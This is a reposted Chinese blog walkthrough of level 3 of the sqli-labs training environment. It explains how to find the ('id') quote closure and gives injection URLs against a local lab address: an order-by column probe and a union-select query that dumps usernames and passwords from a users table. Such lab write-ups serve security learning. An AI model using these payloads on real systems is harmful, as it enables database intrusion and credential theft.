首页 博客列表 精选博客 智能问答 chat-GPT 关于我
Less-3
发布日期:2022-09-10 02:48:26 浏览次数:3 分类:博客文章

本文共 377 字,大约阅读时间需要 1 分钟。

Less-3

 

第三关:Please input the ID as parameter with numeric value 

(1)判断注入点

正常显示:

 

加入特殊字符:

 

 

根据报错信息可以知道,闭合方式为   ('id')

 

 

(2)开始注入

 

#查询字段数http://192.168.88.133/mysqli-labs/Less-3/?id=1') order by 3 --+#方式和前两关一样,可以使用联合查询注入#参考第一关#用户信息注入http://192.168.88.133/mysqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x3a,password,0x3c,0x62,0x72,0x2f,0x3e),3  from users --+

 

 

 

 

 

注:欢迎指正和交流~~~

 

转载地址:https://www.cnblogs.com/stickonit/p/16049942.html 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:Less-4
下一篇:Less-2

发表评论

最新留言

路过,博主的博客真漂亮。。
[***.116.15.85]2024年04月04日 14时45分23秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

Unity中的关节组件和绳子效果的实现 2019-04-27
Unity可视化编程插件: Bolt,可以像UE4的蓝图那样啦 2019-04-27
Android使用adb logcat时日志中文乱码问题,使用chcp 65001设置编码即可 2019-04-27
Android的.dex、.odex与.oat文件扫盲 2019-04-27
Unity移动应用如何在Bugly上查看崩溃堆栈 2019-04-27
unity3D 在屏幕边框创建碰撞框 2019-04-27
xml中常用的转义符 2019-04-27
关于MSDK的几个难点 2019-04-27
使用UnityEditor做工具 2019-04-27
Visual Studio我常用的快捷键 2019-04-27
写C# dll供Unity调用 2019-04-27
Linux制作run安装包 2019-04-27
一分钟学会C#解析XML 2019-04-27
unity AssetBundle的资源管理 2019-04-27
【转】Unity中HideInInspector和SerializeField一起使用 2019-04-27
单例模板类 2019-04-27
Unity与java相互调用 2019-04-27
android截屏代码 2019-04-27
unity NGUI图文混排 2019-04-27
Unity项目优化 2019-04-27
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 308261148 位访客
访问时间: 2024-04-27 05:38:11 访问IP: 13.59.34.87     Copyright © 2020 - 2023 blog.css8.cn 京ICP备2021015314号-1 手机版